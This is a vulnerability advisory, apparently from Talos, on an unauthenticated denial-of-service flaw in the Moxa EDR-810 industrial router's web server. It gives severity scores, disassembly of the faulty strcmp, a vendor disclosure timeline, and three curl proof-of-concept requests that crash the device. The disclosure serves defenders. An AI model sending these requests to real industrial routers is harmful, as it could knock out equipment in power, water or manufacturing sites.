5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.004 Low
EPSS
Percentile
73.6%
An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to β/MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.iniβ without a cookie header to trigger this vulnerability.
Moxa EDR-810 V4.1 build 17030317
<https://www.moxa.com/product/EDR-810.htm>
7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-476 - NULL Pointer Dereference
This device is marketed as a secure ICS (Industrial Control System) router. This device will likely be found in industrial environments such as power generation/distribution, water treatment, manufacturing, etc. This specific vulnerability causes the web server to crash.
A GET request to /MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.ini without a cookie header will cause the binary to crash. Authentication is not required for this vulnerability.
In the following code snippet, R0 is nil if the cookie header is not set. .text:0001B544 LDR R0, [R11,#s1] ; s1 .text:0001B548 LDR R1, =aMoxa_cfg_ini_0 ; β/MOXA_CFG.iniβ .text:0001B54C BL strcmp
In the following code snippet, R0 is nil if the cookie header is not set. .text:0001B55C LDR R0, [R11,#s1] ; s1 .text:0001B560 LDR R1, =aMoxa_cfg2_ini ; β/MOXA_CFG2.iniβ .text:0001B564 BL strcmp
In the following code snippet, R0 is nil if the cookie header is not set. .text:0001B574 LDR R0, [R11,#s1] ; s1 .text:0001B578 LDR R1, =aMoxa_log_ini_0 ; β/MOXA_LOG.iniβ .text:0001B57C BL strcmp
curl -v 192.168.127.254/MOXA_LOG.ini OR
curl -v 192.168.127.254/MOXA_CFG.ini OR
curl -v 192.168.127.254/MOXA_CFG2.ini
2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.004 Low
EPSS
Percentile
73.6%